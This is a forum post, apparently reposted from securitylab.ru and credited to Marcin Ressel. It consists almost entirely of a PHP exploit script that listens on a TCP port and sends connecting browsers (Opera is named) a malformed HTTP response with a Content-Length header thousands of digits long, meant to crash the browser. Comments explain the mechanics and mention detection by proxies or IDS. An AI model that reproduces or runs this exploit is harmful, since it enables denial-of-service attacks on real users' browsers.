
06.03.2010, 23:18
сплоит:
PHP код:
<?php
// Platform probe: define the constant OS as 'win' when the first three
// characters of $_ENV['OS'], lowercased, are "win", and as 'nix' otherwise.
// Only that one environment variable is consulted.
if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
else define('OS','nix');
// The socket_* calls later in the script need PHP's sockets extension.
// If extension_loaded() does not report 'php_sockets', the script tries to
// load the platform-specific library at run time with dl().
if(!extension_loaded('php_sockets'))
{
// '@' suppresses dl()'s own warnings, so the die() message below is the only
// output when loading fails for the detected platform.
if((OS == 'win') && (!@dl('php_sockets.dll')) ||
((OS == 'nix') && (!@dl('php_sockets.so'))))
die('fatal php_sockets.[dll/so] '.
'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
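/* Generated by my own fuzzer.
   $EVIL is a canned HTTP response that is sent to the client verbatim.
   The header that stands out is Content-Length: its value is a digit string
   thousands of characters long, far beyond any integer width (presumably the
   field under test). A client has to bound-check that value before converting
   it, and a proxy or IDS can flag such a response by header length alone. */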
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
// Command-line handling: pick the TCP port the listener will use.
// $buster is the highest valid index into $argv.
$buster = $argc - 1;
// Optional: pass "-port <n>" to choose the port (e.g. -port 666).
// The loop visits the even indices of $argv, starting with $argv[0], and
// assigns $PORT on every pass. The value left after the loop therefore comes
// from the last index visited. Anything other than '-port' followed by a
// positive integer yields the default, 81.
for($i = 0; $i<=$buster; $i+=2)
{
// $PORT keeps the raw argv string when the option matches; only the
// comparison casts it to int.
if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
else $PORT = 81;
}
// Open the listening socket on $PORT and stop if that fails.
// socket_create_listen() is called without an address and binds on all local
// interfaces, so the listener is reachable from the network, not only from
// loopback.
if(!($SOCKET = socket_create_listen($PORT)))
die('fatal socket init failed'."\r\n");
// Set a 3-second receive timeout on the listening socket.
socket_set_option($SOCKET,SOL_SOCKET,
SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
// Status output for the operator; the script now waits for a browser to connect.
echo('SOCKET READY AT PORT '.$PORT."\r\n".
'Now connect here via opera'."\r\n");
// Serve exactly one client: accept a single connection, read a few bytes of
// its request, answer with the canned response in $EVIL, then shut down.
if($CONNECT = socket_accept($SOCKET))
{
$recv_buffer = null;
echo('Connection ok '."\r\n");
// Ask for 8 bytes with MSG_WAITALL. The request is never parsed; receiving
// data only serves as the trigger for sending the response.
if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
{
// '@' hides socket_write()'s warnings. Only a falsy return is treated as
// failure; a partial write is not detected.
if(!@socket_write($CONNECT,$EVIL))
{
socket_close($CONNECT);
socket_close($SOCKET);
die('I cant send payload !'."\r\n");
}
}
else echo('Something wrong with client side'."\r\n");
// Pause 120 ms before closing both sockets.
usleep(120000);
socket_close($CONNECT);
socket_close($SOCKET);
}
// Printed unconditionally, including when socket_accept() failed or nothing
// was received, so this message is not evidence of any effect on the client.
echo('OK ya browser must be death now'."\r\n".
'Have a nice day lol'."\r\n");
?>
автор: Marcin Ressel aka ~echo.
источник: securitylab.ru